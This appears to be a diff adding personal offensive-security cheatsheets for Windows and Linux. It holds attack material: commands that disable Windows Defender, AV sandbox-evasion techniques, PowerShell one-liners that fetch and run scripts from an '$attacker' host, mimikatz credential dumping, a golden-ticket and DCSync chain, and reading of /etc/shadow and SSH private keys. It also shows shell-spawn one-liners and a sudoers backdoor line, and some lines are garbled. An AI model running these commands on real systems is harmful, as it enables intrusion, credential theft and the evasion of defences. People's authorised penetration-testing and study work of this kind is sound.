     783 +C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
     784 +C:/Program Files/MySQL/MySQL Server 5.0/my.ini
     785 +C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
     786 +C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
     787 +C:/Program Files (x86)/Apache Group/Apache/conf/access.log
     788 +C:/Program Files (x86)/Apache Group/Apache/conf/error.log
     789 +C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
     790 +C:/Program Files (x86)/xampp/apache/conf/httpd.conf
     791 +C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM
     792 +C:/Windows/repair/system C:/Windows/repair/software
     793 +C:/Windows/repair/security
     794 +C:/WINDOWS/System32/drivers/etc/hosts
     795 +C:/Windows/win.ini
     796 +C:/WINNT/php.ini
     797 +C:/WINNT/win.ini
     798 +C:/xampp/apache/bin/php.ini
     799 +C:/xampp/apache/logs/access.log
     800 +C:/xampp/apache/logs/error.log
     801 +C:/Windows/Panther/Unattend/Unattended.xml
     802 +C:/Windows/Panther/Unattended.xml
     803 +C:/Windows/debug/NetSetup.log
     804 +C:/Windows/system32/config/AppEvent.Evt
     805 +C:/Windows/system32/config/SecEvent.Evt
     806 +C:/Windows/system32/config/default.sav
     807 +C:/Windows/system32/config/security.sav
     808 +C:/Windows/system32/config/software.sav
     809 +C:/Windows/system32/config/system.sav
     810 +C:/Windows/system32/config/regback/default
     811 +C:/Windows/system32/config/regback/sam
     812 +C:/Windows/system32/config/regback/security
     813 +C:/Windows/system32/config/regback/system
     814 +C:/Windows/system32/config/regback/software
     815 +C:/Program Files/MySQL/MySQL Server 5.1/my.ini
     816 +C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
     817 +C:/Windows/System32/inetsrv/config/applicationHost.config
     818 +C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
     819 +```
     820 + 
     821 +#### Enable execution of PowerShell Scripts <a href="#enable-execution-of-powershell-scripts" id="enable-execution-of-powershell-scripts"></a>
     822 + 
     823 +```
     824 +Set-ExecutionPolicy RemoteSigned
     825 +Set-ExecutionPolicy Unrestricted
     826 +powershell.exe -exec bypass
     827 +```
     828 + 
     829 +#### Encode Powershell b64 from Linux <a href="#encode-powershell-b64-from-linux" id="encode-powershell-b64-from-linux"></a>
     830 + 
     831 +```
     832 +echo 'ImAnEviCradleBuuhhhh' | iconv -t UTF-16LE | base64 -w0
     833 +```
     834 + 
     835 +#### Encode/Decode b64 in Windows WITHOUT Powershell <a href="#encodedecode-b64-in-windows-without-powershell" id="encodedecode-b64-in-windows-without-powershell"></a>
     836 + 
     837 +```
     838 +certutil -encode <inputfile> <outputfile>
     839 +certutil -decode <b64inputfile> <plainoutputdecodedfile>
     840 + ^-- If the file exists I can use the -f flag which will force an overwrite
     841 +```
     842 + 
     843 +#### Check the Type of Language available with Powershell <a href="#check-the-type-of-language-available-with-powershell" id="check-the-type-of-language-available-with-powershell"></a>
     844 + 
     845 +```
     846 +$ExecutionContext.SessionState.LanguageMode
     847 + 
     848 +Possible types are:
     849 + - Full Language
     850 + - RestrictedLanguage
     851 + - No Language
     852 + - Constrained Language
     853 +```
     854 + 
     855 +#### Set Proxy in code used (Windows) <a href="#set-proxy-in-code-used-windows" id="set-proxy-in-code-used-windows"></a>
     856 + 
     857 +**Powershell**
     858 + 
     859 +```
     860 +[System.Net.WebRequest]::DefaultWebProxy.GetProxy(url)
     861 +```
     862 + 
     863 +**JScript**
     864 + 
     865 +```
     866 +var url = "";
     867 +var var Object = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");
     868 +Object.setProxy("2","");
     869'GET', url, false);
     870 +Object.send();
     871 + ^-- This was tricky because lack of debug information. The parameter in "2" means "SXH_PROXY_SET_PROXY", and it allows to specify a list of one or more servers together with a bypass list. The .open() must be in lowercase otherwise .Open() is another method
     872 +```
     873 + 
     874 +#### Hide Foreground with WMI (Windows, Office Macros) <a href="#hide-foreground-with-wmi-windows-office-macros" id="hide-foreground-with-wmi-windows-office-macros"></a>
     875 + 
     876 +```
     877 +Sub example()
     878 + Const HIDDEN_WINDOW = 0
     879 + Dim cmd As String
     880 + 
     881 + cmd = "Here there is some commands to execute inside the macro via WMI"
     882 + Set objWMIService = GetObject("winmgmts:")
     883 + Set objStartup = objWMIService.Get("Win32_ProcessStartup")
     884 + Set objConfig = objStartup.SpawnInstance_
     885 + objConfig.ShowWindow = HIDDEN_WINDOW
     886 + Set objProcess = GetObject("winmgmts:Win32_Process")
     887 + errReturn = objProcess.Create(str, Null, objConfig, pid)
     888 +End Sub
     889 +```
     890 + 
     891 +### Simple Buffer Overflow (32 bits, NO ASLR and NO DEP) <a href="#simple-buffer-overflow-32-bits-no-aslr-and-no-dep" id="simple-buffer-overflow-32-bits-no-aslr-and-no-dep"></a>
     892 + 
     893 +#### Summarized steps <a href="#summarized-steps" id="summarized-steps"></a>
     894 + 
     895 +* 0 - Crash the application
     896 +* 1 - Fuzzing (find aprox number of bytes where the crash took place)
     897 +* 2 - Find offset
     898 +* 3 - EIP control
     899 +* 4 - Check for enough space on buffer
     900 +* 5 - Badchars counting
     901 +* 6 - Find return address (JMP ESP)
     902 +* 7 - Create payload
     903 + 
     904 +#### Fuzzing: example with vulnserver + spike on TRUN command <a href="#fuzzing-example-with-vulnserver--spike-on-trun-command" id="fuzzing-example-with-vulnserver--spike-on-trun-command"></a>
     905 + 
     906 +```
     907 +cat > trun.spk <<EOF
     908 +s_readline();
     909 +s_string("TRUN ");
     910 +s_string_variable("COMMAND");
     911 +EOF
     912 +```
     913 + 
     914 +Now, start wireshark filtering on the target IP/PORT below and run the `trun.spk`:
     915 + 
     916 +```
     917 +generic_send_tcp 9999 trun.spk 0 0
     918 +```
     919 + 
     920 +Once a crash takes place, go to wireshark to locate the crash.
     921 + 
     922 +#### Badchars <a href="#badchars" id="badchars"></a>
     923 + 
     924 +From the block below, the next ones were not included (most common badchars):
     925 + 
     926 +```
     927 +\x00 --> null byte
     928 +\x0a --> new line character (AKA "\n")
     929 +```
     930 + 
     931 +So…actual list of badchars:
     932 + 
     933 +```
     934 +\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
     935 +```
     936 + 
     937 +#### Usefull tools (on Kali Linux) <a href="#usefull-tools-on-kali-linux" id="usefull-tools-on-kali-linux"></a>
     938 + 
     939 +**create\_pattern**
     940 + 
     941 +```
     942 +/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
     943 +/usr/bin/msf-pattern_create
     944 +```
     945 + 
     946 +**pattern\_offset**
     947 + 
     948 +```
     949 +/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb
     950 +/usr/bin/msf-pattern_offset
     951 +```
     952 + 
     953 +**nasm\_shell**
     954 + 
     955 +```
     956 +/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
     957 +/usr/bin/msf-nasm_shell
     958 +```
     959 + 
     960 +**msfvenom**
     961 + 
     962 +```
     963 +/usr/share/metasploit-framework/msfvenom
     964 +/usr/bin/msfvenom
     965 +```
     966 + 
     967 +#### Shellcode POC: calc.exe <a href="#shellcode-poc-calcexe" id="shellcode-poc-calcexe"></a>
     968 + 
     969 +```
     970 +msfvenom -p windows/exec -b '\x00\x0A' -f python --var-name buffer CMD=calc.exe EXITFUNC=thread
     971 +```
     972 + 
     973 +### Antivirus Bypass <a href="#antivirus-bypass" id="antivirus-bypass"></a>
     974 + 
     975 +Antivirus tend to flag malware by Signature/Heuristics detection, we could bypass these throughout certain techniques For more details, look up into the \[Exploit Development/Reversing/AV|EDR Bypass]\([](|EDR Bypass) Section on the resources part of my blog.
     976 + 
     977 +#### Signature Bypass <a href="#signature-bypass" id="signature-bypass"></a>
     978 + 
     979 +For example, we can obfuscate the code ciphering and/or encoding (having a decipher/decoding routine in the code), as also leverage tools dedicated for this purpose. Another thing is to use NOT common name for functions, variable names, etc; lunfardos, slang, idioisms, weird words from the dictionary, etc.
     980 + 
     981 +#### Heuristics Bypass <a href="#heuristics-bypass" id="heuristics-bypass"></a>
     982 + 
     983 +As for the heuristics for example AV’s tend to execute the malware inside a sandbox, we could have code for detecting if running inside a sandbox and exit if this is true. I could use the following techniques:
     984 + 
     985 +* Sleep command and comparision of how real time has passed (AV’s could NOT wait until the sleep and just fast-forward the time)
     986 +* A counter up to 1 billon (Same story than Sleep, could not wait until it finishes and just exits)
     987 +* Call Windows API’s poor or not even documented (as AV’s tend to emulate API’s inside the sandboxes, but some of them will not, then at the malware trying to call it and not existing, it will be detected is running inside a Sandbox)
     988 +* Verifying the name of the malware (AV’s could rename the file, if it has changed it might be running inside a sandbox)
     989 +* Veifying if I can allocate TOO MUCH memory
     990 +* Checking if a known user in the system exists, if it doesn’t exit
     991 + 
     992 +#### If NOT AV Bypass and Admin, DISABLE Defender <a href="#if-not-av-bypass-and-admin-disable-defender" id="if-not-av-bypass-and-admin-disable-defender"></a>
     993 + 
     994 +If we have admin creds, we could disable Win Defender, please note THIS IS NEVER a good idea in production environments as this can be monitored!!
     995 + 
     996 +```
     997 +# Query if there is already an excluded path
     998 + Get-MpPreference | select-object -ExpandProperty ExclusionPath
     999 +# Disable real time monitoring
     1000 + Set-MpPreference -DisableRealtimeMonitoring $true
     1001 +# Exclude temp dir from monitoring by defender
     1002 + Add-MpPreference -ExclusionPath "C:\windows\temp"
     1003 +# Disable Defender ONLY for downloaded files
     1004 + Set-MpPreference -DisableIOAVProtection $true
     1005 +# Or REMOVE ALL Signature's but leave it enabled
     1006 + "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
     1007 +```
     1008 + 
     1009 +#### AMSI Bypass <a href="#amsi-bypass" id="amsi-bypass"></a>
     1010 + 
     1011 +AMSI (Anti-Malware Scan Interface), in short sit’s between Powershell and Defender, so even if our crafted malware/tools have an AV Bypass, it still can be flagged by AMSI (annoying!), AMSI can also be leveraged for example for EDR’s. There are certain ways to bypass AMSI, for example forcing it to fail.
     1012 + 
     1014 + 
     1015 +### Active Directory <a href="#active-directory" id="active-directory"></a>
     1016 + 
     1017 +#### Permissions: ACE (Access Control Enties) SDDL (Security Descriptor Definition Language) - Format <a href="#permissions-ace-access-control-enties-sddl-security-descriptor-definition-language---format" id="permissions-ace-access-control-enties-sddl-security-descriptor-definition-language---format"></a>
     1018 + 
     1019 +```
     1020 +ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
     1021 + 
     1022 +--> ace_type: defines allow/deny/audit
     1023 +--> ace_flags: inheritance objects
     1024 +--> rights: incremental list with given permissions (allowed/audited/denied), incrmentalas ARE NOT the only ones
     1025 +--> object_guid and inherit_object: Allows to apply an ACE on a specified objects by GUID values. GUID is an object class, attribute, set or extended right, if pressent limits the ACE's to the object the GUID represents. Inherited GUID represents an object class, if present will limit the inheritance of ACE's to the child enties only of that object
     1026 +--> account_sid: SID of the object the ACE is applying, is the SID of the user or group to the one permissions are being assigned, sometimes there are acronyms of well known SID's instead of numerical ones
     1027 +```
     1028 + 
     1029 +#### BloodHound <a href="#bloodhound" id="bloodhound"></a>
     1030 + 
     1031 +```
     1032 +$attacker="";$domain="";IEX(New-Object Net.Webclient).downloadString("http://$attacker/4msibyp455.ps1");IEX(New-Object Net.Webclient).downloadString("http://$attacker/SharpHound.ps1");Invoke-BloodHound -CollectionMethod All,GPOLocalGroup,LoggedOn -Domain $domain
     1033 +```
     1034 + 
     1035 +#### PowerView methods for enumeration <a href="#powerview-methods-for-enumeration" id="powerview-methods-for-enumeration"></a>
     1036 + 
     1037 +This is the command for download injected into memory with an AMSI Bypass before
     1038 + 
     1039 +```
     1040 +$user="userNameHereIfQueryUsesIt";$attacker="";$dominio="";IEX(New-Object Net.Webclient).downloadString("http://$attacker/nieri.ps1");IEX(New-Object Net.Webclient).downloadString("http://$attacker/PowerView.ps1");OneOfThePowerViewCmdsFromBelowHere
     1041 +```
     1042 + 
     1043 +**ACLs**
     1044 + 
     1045 +```
     1046 +Get-ObjectAcl -Identity ceso <-- Get all the objects and acls the given user has
     1047 +```
     1048 + 
     1049 +**Users**
     1050 + 
     1051 +```
     1052 +Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | ForEach-Object {$_ | Add-Member -NoteProperty Name Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | ForEach-Object {if ( $_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}} <-- Maps all users in the domain into a table replacing the SID for the name
     1053 + 
     1054 +Get-DomainUser -Domain <-- Enumeration truncated only to the users in the given domain
     1055 + 
     1056 +Get-DomainUser -TrustedToAut <-- List all the SPN's which have Constrained Delegation
     1057 +```
     1058 + 
     1059 +**Groups**
     1060 + 
     1061 +```
     1062 +Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | ForEach-Object {$_ | Add-Member -NoteP ropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | ForEach-Objec t {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}} <-- Maps all groups in the domain into a table replacing the SID for the name
     1063 + 
     1064 +Get-DomainGroup -Domain <-- Enumeration truncated only to the users in the given domain
     1065 + 
     1066 +Get-DomainGroupMember "Enterprise Admins" -Domain <-- Get ALL the members of the group "Enterprise Admins" inside the domain
     1067 + 
     1068 +Get-DomainForeignGroupMember -Domain <-- Enumerate groups in a trusted forest or domain which contains NON-NATIVE members
     1069 +```
     1070 + 
     1071 +**Computers**
     1072 + 
     1073 +```
     1074 +Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identit y -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}} <-- Enumerate computers accounts in the domain
     1075 + 
     1076 +Get-DomainComputer -Unconstrained <-- Enumerate unconstrained computers
     1077 + 
     1078 +Get-DomainComputer -Identity cesoComputer <-- Verify that cesoComputer exists
     1079 +```
     1080 + 
     1081 +**Trusts**
     1082 + 
     1083 +```
     1084 +Get-DomainTrust <-- Enumerate trusts by making an LDAP query, this works by the DC creating a Trusted Domain Object (TDO)
     1085 + 
     1086 +Get-DomainTrust -API <-- Enumerate trusts by using Win32 API DsEnumerateDomainTrusts
     1087 + ^-- If I add the -domain flag, it will enumerate all the found in the domain
     1088 + 
     1089 +Get-DomainTrustMapping <-- Automate the process of enumeration for all forest trust and their child domains trust
     1090 +```
     1091 + 
     1092 +**SID’s**
     1093 + 
     1094 +```
     1095 +Get-DomainSID <-- Get the SID of the current domain
     1096 +Get-DomainSID -Domain <-- Get the SID of
     1097 +```
     1098 + 
     1099 +#### Exploitation <a href="#exploitation" id="exploitation"></a>
     1100 + 
     1101 +**List all available credentials cached (Hashes and Passwords; Logged on user and computer)**
     1102 + 
     1103 +```
     1104 +mimikatz.exe "sekurlsa::logonpasswords" exit
     1105 +```
     1106 + 
     1107 +**Convert to ccache**
     1108 + 
     1109 +We can use the tool `ticket_converter` written by `zer1t0` for converting kirbi tickets to ccache and viceversa:
     1110 + 
     1111 +```
     1112 +Convert from b64 encoded blob to kirbi:
     1113 + [IO.File]::WriteAllBytes("C:\fullpathtoticket.kirbi", [Convert]::FromBase64String("aa…"))
     1114 +Convert the .kiribi to .ccache:
     1115 + python ticket.ccache ticket.kirbi
     1116 +Copy the ccache to our attacker machine and export the KRB5CCNAME variable:
     1117 + export KRB5CCNAME=/path/to/ticket.ccache
     1118 +```
     1119 + 
     1120 +**GenericAll**
     1121 + 
     1122 +**GenericWrite**
     1123 + 
     1124 +**WriteDACL**
     1125 + 
     1126 +**Unconstrained Delegation**
     1127 + 
     1128 +We have local adminstrative access to a host which is configured for Kerberos Unconstrained Delegation. We can leverage Rubeus for an auth from the DC and then steal the TGT, this can be used to perform a DCSync to obtain the NTLM hash for ANY account. Other way is by triggering the printer bug on a domain controller to coerce to authenticate to the host compromised we have using it’s machine account.
     1129 + 
     1130 +If a computer account has `TRUSTED_FOR_DELEGATION` in it’s UserAccountControl (UAC), then it’s a viable target. Domain controllers will also have `SERVER_TRUST_ACCOUNT_UAC`, so…if it the machine has this, then it’s a DC.
     1131 + 
     1132 +**By Forwardable TGT after login**
     1133 + 
     1134 +```
     1135 +1 - Enumerate if there if there is unconstrained delegation
     1136 +2 - If there is, open mimikatz (commands blow are inside it)
     1137 +3 - privilege::debug <-- Enable debug
     1138 +4 - sekurlsa::tickets <-- List all the present tickets
     1139 +5 - Through phishing or visit of a page, if the user has Windows Auth then it will use kerberos
     1140 +6 - sekurlsa::tickets <-- Verify if there are new TGT's
     1141 +7 - sekurlsa::tickets /export <-- If new TGT and marked as forwardable export them to disk
     1142 +8 - kerberos::ptt /inject:<some-exported-tkt-file.kirbi> <-- Inject the exported ticket into memory
     1143 +9 - C:\Windows\Temp\PsExec.exe \\ cmd <-- Try to get a cmd shell in by leveraging injected ticket
     1144 + 
     1145 +* By default every user allows their TGT to be delegated, but high privilege users can be added to the group "Protected Users Group" to disable it, it also can break the application for which at the beggining unconstrained delegation was enabled for those users
     1146 +```
     1147 + 
     1148 +**By using of SpoolSample.exe (printer bug)**
     1149 + 
     1150 +```
     1151 +1 - Download and compile SpoolSample in a dev machine, it can be downloaded from:
     1152 +2 - Download and compile Rubeus in a dev machine, it can be downloaded from:
     1153 +3 - Find a way to upload SpoolSample and Rubeus without being detected (for example, disabling Windows Defender, or injecting them into memory through reflection for example), for ease of the technique, all below is just written to disk
     1154 +4 - Rubeus.exe monitor /interval:5 /filteruser:DC01$ <-- Monitor for TGTs originated in the DC01 machine. THIS MUST BE RUN FROM A DIFFERENT SHELL THAN THE ONE USED FOR THE NEXT STEP
     1155 +5 - SpoolSample.exe DC01 VICTIM01 <-- Leverage "RpcOpenPrinter" and "RpcRemoteFindFirstPrinterChangeNotification" to get a notif
     1156 +6 - Rubeus.exe ptt /ticket:<b64-from-rubeus-monitor> <-- Inject into memory the b64 ticket obtained by monitoring for tickets from DC01 to VICTIM01
     1157 +7 - lsadump::dcsync / /user:example\krbtgt <-- Dump the NTLM hash of the krbtgt user by leveraging the just injected ticket (It could also be possible to dump the hash of the pass of a member from the "Domain Admins" group). THIS IS RUN FROM INSIDE MIMIKATZ
     1158 +8 - kerberos::golden /user:krbtgt / /sid:<sid-showed-in-dcsync or obtained by PowerView> /rc4:<ntlm-hash-dumped-with-dcsync> /ptt <-- Craft a golden ticket and inject it into memory
     1159 +9 - dir \\dc01\\c$ <-- Verify read access on dc01
     1160 +10 - misc::cmd <-- Open cmd prompt from inside Mimikatz
     1161 +11 - C:\Windows\Temp\PsExec.exe -accepteula \\dc01 cmd <-- Get a shell on dc01 by leveraging the golden ticket injected
     1162 +```
     1163 + 
  • ■ ■ ■ ■ ■ ■
     1 +# Linux-Cheatsheet
     2 + 
     3 +A place for me to store my notes/tricks for Linux Based Systems
     4 + 
     5 +**Note: These notes are heavily based off other articles, cheat sheets and guides etc. I just wanted a central place to store the best ones.**&#x20;
     6 + 
     7 +**Reference:** [](
     8 + 
     9 +Also this will probably be a lot smaller than my Windows Cheat sheet because I hate Linux.
     10 + 
     11 +### Enumeration
     12 + 
     13 +Basics
     14 + 
     15 +```
     16 +whoami
     17 +hostname
     18 +uname -a
     19 +cat /etc/password
     20 +cat /etc/shadow
     21 +groups
     22 +ifconfig
     23 +netstat -an
     24 +ps aux | grep root
     25 +uname -a
     26 +env
     27 +id
     28 +cat /proc/version
     29 +cat /etc/issue
     30 +cat /etc/passwd
     31 +cat /etc/group
     32 +cat /etc/shadow
     33 +cat /etc/hosts
     34 +```
     35 + 
     36 +Recon
     37 + 
     38 +```
     39 +Always start with a stealthy scan to avoid closing ports.
     40 + 
     41 +# Syn-scan
     42 +nmap -sS INSERTIPADDRESS
     43 + 
     44 +# Scan all TCP Ports
     45 +nmap INSERTIPADDRESS -p-
     46 + 
     47 +# Service-version, default scripts, OS:
     48 +nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333
     49 + 
     50 +# Scan for UDP
     51 +nmap INSERTIPADDRESS -sU
     52 + 
     53 +# Connect to udp if one is open
     54 +nc -u INSERTIPADDRESS 48772
     55 + 
     56 +```
     57 + 
     58 +UDP Scan
     59 + 
     60 +```
     61 +./udpprotocolscanner <ip>
     62 +```
     63 + 
     64 +FTP Enum
     65 + 
     66 +```
     67 +nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
     68 +```
     69 + 
     70 +Start Web Server
     71 + 
     72 +```
     73 +python -m SimpleHTTPServer 80
     74 +```
     75 + 
     76 +### Exploit
     77 + 
     78 +libSSH Authentication Bypass - CVE-2018-10933
     79 + 
     80 +```
     81 +
     82 + 
     83 +Use nc <ip> 22 to banner grab the SSH Service, if it's running vulnerable version of libSSH then you can bypass
     84 +```
     85 + 
     86 +### Privilege Escalation
     87 + 
     88 +Basics
     89 + 
     90 +```
     91 +cat /proc/version <- Check for kernel exploits
     92 +ps auxww
     93 +ps -ef
     94 +lsof -i
     95 +netstat -laputen
     96 +arp -e
     97 +route
     98 +cat /sbin/ifconfig -a
     99 +cat /etc/network/interfaces
     100 +cat /etc/sysconfig/network
     101 +cat /etc/resolv.conf
     102 +cat /etc/sysconfig/network
     103 +cat /etc/networks
     104 +iptables -L
     105 +hostname
     106 +dnsdomainname
     107 +cat /etc/issue
     108 +cat /etc/*-release
     109 +cat /proc/version
     110 +uname -a
     111 +rpm -q kernel
     112 +dmesg | grep Linux
     113 +ls /boot | grep vmlinuz-
     114 +lsb_release -a
     115 +```
     116 + 
     117 +Run pspy64
     118 + 
     119 +```
     120 +#
     121 + 
     122 +Run in background and watch for any processes running
     123 +```
     124 + 
     125 +Spawn TTY
     126 + 
     127 +```
     128 +#
     129 + 
     130 +python -c 'import pty; pty.spawn("/bin/sh")'
     131 +echo os.system('/bin/bash')
     132 +awk 'BEGIN {system("/bin/sh")}'
     133 +find / -name blahblah 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
     134 +python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
     135 +perl -e 'exec "/bin/sh";'
     136 +perl: exec "/bin/sh";
     137 +ruby: exec "/bin/sh"
     138 +lua: os.execute('/bin/sh')
     139 +irb(main:001:0> exec "/bin/sh"
     140 +Can also use socat
     141 +```
     142 + 
     143 +Enum Scripts
     144 + 
     145 +```
     146 +cd /EscalationServer/
     147 +chmod u+x
     148 +chmod 700
     149 + 
     150 +./
     151 +python
     152 +```
     153 + 
     154 +Add User to Sudoers
     155 + 
     156 +```
     157 +echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
     158 +```
     159 + 
     160 +List CronJobs
     161 + 
     162 +```
     163 +crontab -l
     164 +ls -alh /var/spool/cron
     165 +ls -al /etc/ | grep cron
     166 +ls -al /etc/cron*
     167 +cat /etc/cron*
     168 +cat /etc/at.allow
     169 +cat /etc/at.deny
     170 +cat /etc/cron.allow
     171 +cat /etc/cron.deny
     172 +cat /etc/crontab
     173 +cat /etc/anacrontab
     174 +cat /var/spool/cron/crontabs/root
     175 +```
     176 + 
     177 +Check for SSH Readable SSH Keys for Persistence and Elevation
     178 + 
     179 +```
     180 +cat ~/.ssh/authorized_keys
     181 +cat ~/.ssh/
     182 +cat ~/.ssh/identity
     183 +cat ~/.ssh/
     184 +cat ~/.ssh/id_rsa
     185 +cat ~/.ssh/
     186 +cat ~/.ssh/id_dsa
     187 +cat /etc/ssh/ssh_config
     188 +cat /etc/ssh/sshd_config
     189 +cat /etc/ssh/
     190 +cat /etc/ssh/ssh_host_dsa_key
     191 +cat /etc/ssh/
     192 +cat /etc/ssh/ssh_host_rsa_key
     193 +cat /etc/ssh/
     194 +cat /etc/ssh/ssh_host_key
     195 +```
     196 + 
     197 +Startup Scripts
     198 + 
     199 +```
     200 +find / -perm -o+w -type f 2>/dev/null | grep -v '/proc\|/dev'
     201 +```
     202 + 
     203 +Find Writable Files for Users or Groups
     204 + 
     205 +```
     206 +find / perm /u=w -user `whoami` 2>/dev/null
     207 +find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
     208 +find / -perm /u+w -user `whoami` 2>/dev/nul
     209 +```
     210 + 
     211 +Find Writable Directories for Users or Groups
     212 + 
     213 +```
     214 +find / perm /u=w -type -d -user `whoami` 2>/dev/null
     215 +find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null
     216 +```
     217 + 
     218 +Find World Writable Directories
     219 + 
     220 +```
     221 +find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';'
     222 +2>/dev/null | grep -v root
     223 + 
     224 +find / -writable -type d 2>/dev/null
     225 +```
     226 + 
     227 +Find World Writable Directories for Root
     228 + 
     229 +```
     230 +find / \( -wholename ‘/home/homedir*’ -prune \) -o \( -type d -perm -0002 \) -exec ls -ld ‘{}’ ‘;’
     231 +2>/dev/null | grep root
     232 +```
     233 + 
     234 +Find World Writable Files
     235 + 
     236 +```
     237 +find / \( -wholename ‘/home/homedir/*’ -prune -o -wholename ‘/proc/*’ -prune \) -o \( -type f -perm
     238 +-0002 \) -exec ls -l ‘{}’ ‘;’ 2>/dev/null
     239 +```
     240 + 
     241 +Find World Writable files in /etc
     242 + 
     243 +```
     244 +find /etc -perm -2 -type f 2>/dev/null
     245 +```
     246 + 
     247 +Sniff Traffic
     248 + 
     249 +```
     250 +tcpdump -i eth0 <protocol>
     251 +tcpdump -i any -s0 -w capture.pcap
     252 +tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
     253 +tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
     254 +```
     255 + 
     256 +User Installed Software (Sometimes Misconfigured)
     257 + 
     258 +```
     259 +/usr/local/
     260 +/usr/local/src
     261 +/usr/local/bin
     262 +/opt/
     263 +/home
     264 +/var/
     265 +/usr/src/
     266 +```
     267 + 
     268 +### Post Exploitation
     269 + 
     270 +Get Capabilities
     271 + 
     272 +```
     273 +/sbin/getcap -r / 2>/dev/null
     274 +```
     275 + 
     276 +Get SUID Binaries
     277 + 
     278 +```
     279 +find / -perm -u=s -type f 2>/dev/null
     280 +```
     281 + 
     282 +Check Sudo Config
     283 + 
     284 +### File Transfers
     285 + 
     286 +Base64
     287 + 
     288 +```
     289 +cat file.transfer | base64 -w 0
     290 +echo base64blob | base64 -d > file.transfer
     291 +```
     292 + 
     293 +Curl
     294 + 
     295 +```
     296 +curl http://webserver/file.txt > output.txt
     297 +```
     298 + 
     299 +wget
     300 + 
     301 +```
     302 +wget http://webserver/file.txt > output.txt
     303 +```
     304 + 
     305 +FTP
     306 + 
     307 +```
     308 +pip install pyftpdlib
     309 +python -m pyftpdlib -p 21 -w
     310 +```
     311 + 
     312 +TFTP
     313 + 
     314 +```
     315 +service atftpd start
     316 +atftpd --daemon --port 69 /tftp
     317 +/etc/init.d/atftpd restart
     318 +auxiliary/server/tftp
     319 +```
     320 + 
     321 +NC Listeners
     322 + 
     323 +```
     324 +nc -lvnp 443 < filetotransfer.txt
     325 +nc <ip> 443 > filetransfer.txt
     326 +```
     327 + 
     328 +PHP File Transfers
     329 + 
     330 +```
     331 +echo "<?php file_put_contents('nameOfFile', fopen('', 'r')); ?>" > down2.php
     332 +```
     333 + 
     334 +SCP
     335 + 
     336 +```
     337 +# Copy a file:
     338 +scp /path/to/source/file.ext [email protected]:/path/to/destination/file.ext
     339 + 
     340 +# Copy a directory:
     341 +scp -r /path/to/source/dir [email protected]:/path/to/destination
     342 +```
     343 + 
     344 +### Lateral Movement / Pivoting
     345 + 
     346 +SSH Local Port Forward
     347 + 
     348 +```
     349 +ssh <user>@<target> -L<targetip>:<targetport>
     350 +```
     351 + 
     352 +SSH Dynamic Port Forward
     353 + 
     354 +```
     355 +ssh -D <localport> user@host
     356 +nano /etc/proxychains.conf
     357 + <localport>
     358 +```
